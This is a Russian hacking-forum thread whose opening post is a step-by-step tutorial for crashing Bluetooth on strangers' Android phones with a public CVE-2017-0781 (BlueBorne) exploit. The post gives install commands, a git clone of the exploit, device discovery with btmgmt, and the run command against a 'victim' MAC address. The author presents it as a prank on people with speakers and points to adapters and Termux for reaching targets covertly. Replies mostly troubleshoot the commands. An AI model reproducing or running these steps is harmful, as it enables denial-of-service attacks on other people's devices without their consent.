Обрубаем любителей face-а на колонках или как отключить Bluetooth на чужом девайсе.

cR0NuS · 4 дек 2017

Доброго времени суток. Опять пишу всякие "хацкерские" темы в ночное время суток( по МСК). Ладно, не суть. Сегодня хотел бы рассказать вам об уязвимости, которая известно давно...Просто о ней на время забыли, т.к. не выкладывали exploit...И вот на днях совершилось чудо! На гитхабе выложили скрипт python-а с использованием уязвимости(CVE-2017-0781/ Blueborn).
Суть exploit-а в том, что бы вызвать принуждённое отключение bluetooth на устройстве "жертвы". Грубо говоря, exploit бьёт по уязвимым местам прошивки android( как пишут некоторые люди, ios тоже через раз получается) и вызывает ошибку типа null-byte(переполнение буфера).

UPD: Было лично протестировано на своём телефоне - MEIZU M5 NOTE с обновлённым Flyme OS.

Приступим!

>Первым делом нам нужно установить зависимости скрипта.
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential

Код
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Затем обновляем модули python.
pip install --upgrade pip
pip install --upgrade pwntools

Код
pip install --upgrade pip

pip install --upgrade pwntools
Для работы с bluetooth с помощью python нам понадобится модуль pybluez.
apt-get install bluetooth libbluetooth-dev
pip install pybluez

Код
apt-get install bluetooth libbluetooth-dev

pip install pybluez
>Затем приступаем к скачиванию эксплоита(корректней будет назвать скриптом).
git clone [URL]https://github.com/ojasookert/CVE-2017-0781[/URL]

Код
git clone [URL]https://github.com/ojasookert/CVE-2017-0781[/URL]
>Дальше нам придётся попотеть...Т.к. проблема может быть следующая:
Не работает bluetooth....Для этого используем утиллиту btmgmt.
Запускаем её и делаем следующие шаги:
btmgmt --index 0
power
auto-power
find

Код
btmgmt --index 0

power

auto-power

find
Если начнется мониторинг Bluetooth устройств - значит всё готово.
>Используем скрипт. Для этого нам нужен MAC-адресс bluetooth устройства(используем команду btmgmt --index 0 и find).
Как только нашли "жертву", вводим команду.
python CVE-2017-0781.py TARGET=*mac-адресс с заглавными буквами.*

Код
python CVE-2017-0781.py TARGET=*mac-адресс с заглавными буквами.*
И ждём. Мониторить устройство можете с других или же через консоль.

#мояСТАТЬЯ!!!!!

cR0NuS · 4 дек 2017

Так же подробно о использовании скрипта описано в README,md <3

Ernesst_inactive198775 · 4 дек 2017

а не легче просто включить блютузи начать конектится к пацану с колонкой (к его телефону а не к колонке) у него блютус должен збится

cR0NuS · 4 дек 2017

Ernesst_inactive198775, Ну вообще тема кликбейт. Использовать данную уязвимость можно и в более серьёзных делах...И вообще, где ты такое видел, что подключаясь к телефону человека, он автоматически дисконнектится от других девайсов? Я лично такое нигде не наблюдал, даже на старых телефонах с Java-ой.

cR0NuS · 4 дек 2017

Ignes Стоишь возле чувака с колонкой, и пишешь что-то в ноуте, и тут внезапно колонка перестает работать
Нажмите, чтобы раскрыть...

Не обязательно стоять вблизи к нему. Можно использовать специальные адаптеры. К тому же если поработать головой, можно и утиллиту залить на телефон(дам подсказку - Termux).

retr0_inactive63222 · 8 дек 2017

cR0NuS apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Нажмите, чтобы раскрыть...

Проверил на двух устройствах, команда не работает

_KICKER_ · 8 дек 2017

я их с локтя обычно вырубаю

cR0NuS · 9 дек 2017

retr0_inactive63222, от права администратора пиши.

# sudo *команда*

retr0_inactive63222 · 9 дек 2017

cR0NuS, как-то вот так получается, найти бы где ошибка

cR0NuS · 18 дек 2017

retr0_inactive63222, я разве говорил, что это для Termux?..

retr0_inactive63222 · 19 дек 2017

cR0NuS retr0_inactive63222, я разве говорил, что это для Termux?..
Нажмите, чтобы раскрыть...

Нет, но и в командной строке iOS с JB та же ошибка. Тем более ты сам советовал Termux

cR0NuS К тому же если поработать головой, можно и утиллиту залить на телефон(дам подсказку - Termux).
Нажмите, чтобы раскрыть...

cR0NuS · 19 дек 2017

retr0_inactive63222, Я написал, что надо поработать головой, а не тупо как даун-скрипкидди копировать-вставить в Termux....

Alab_inactive178380 · 19 дек 2017

Ignes Стоишь возле чувака с колонкой, и пишешь что-то в ноуте, и тут внезапно колонка перестает работать
Нажмите, чтобы раскрыть...

code_bit · 21 дек 2017

Не работает на :
btmgmt --index 0
power
auto-power
find
после power пишет specify "on" or "off"
потом пишу find и выдаёт это
Unable to start discovery. status 0x11 (Invalid Index)
Подскажи чё делать?

NothingSpecial · 21 дек 2017

cR0NuS Не обязательно стоять вблизи к нему. Можно использовать специальные адаптеры. К тому же если поработать головой, можно и утиллиту залить на телефон(дам подсказку - Termux).
Нажмите, чтобы раскрыть...

А если по Termux, код такой же?

cR0NuS · 21 дек 2017

NothingSpecial, Там уже самим надо думать, какие команды вписывать. Потом как нить в тему добавлю.

cR0NuS · 21 дек 2017

code_bit, Сейчас точно не смогу ответить, в ближайшие сутки распишу. Попробуй пока через другое устройство на базе android чекать, вроде mac-адреса показывает...Правда не у всех наверное.

jvscrpt · 21 дек 2017

Авторскую ему

ban9it_inactive241226 · 31 дек 2017

Круто.

code_bit · 31 дек 2017

cR0NuS code_bit, Сейчас точно не смогу ответить, в ближайшие сутки распишу. Попробуй пока через другое устройство на базе android чекать, вроде mac-адреса показывает...Правда не у всех наверное.
Нажмите, чтобы раскрыть...

Ну что проблему решил?

Форк бомба на Linux.

Есть статьи по maltego?

Пробиваем людей по номеру

Гейминг на Linux: миф или реальность?

Подглядываем за чужой вебкой [Kali Linux]

Разведка для pentesta | принципы разведки | инструменты для разведки

****им RDP, SSH, VNC с помощью Crowbar

Как поиграть в игры на linux лёгкий способ

КАК ХАЦНУТЬ wi-fi?

Базовая информация по сетевому взаимодействию

Установка kali linux на android (termux)

Как установить Kali Linux на флешку с сохранением и без + переходом Gnub ? Мини-Гайд

Взлом ПК с помощью GIF

Взламываем сайты за 5 минут [ Kali Linux ]

Взлом любого телефона Android за пару минут

Создание бэкдора HTTP-сервера Apache

Базовая эскалация привелегий (PrivEsc)

Браузер в консоли Linux

Среда Kali Nethunter в Termux (Перезалив)

[ Kali Linux ] Роняем сайты c помощью "Xerses"

Площадки по пентесту в 2024 году

Взлом Андроид телефона

Взлом Android с помощью Kali (Удаленно)

Решение проблемы подключения ардуино к Ubuntu

Быстрый анализатор ссылок PIDRILA (лучше чем Dirb)

Memcrashed ddos termux

Инструкция по использованию Wifite

Инструменты Kali Linux: мощь тестирования и безопасности (Новичкам)

Установка Python нужной версии на Kali Linux

Взлом/перебор логин-панелей Wordpress

Обрубаем любителей face-а на колонках или как отключить Bluetooth на чужом девайсе.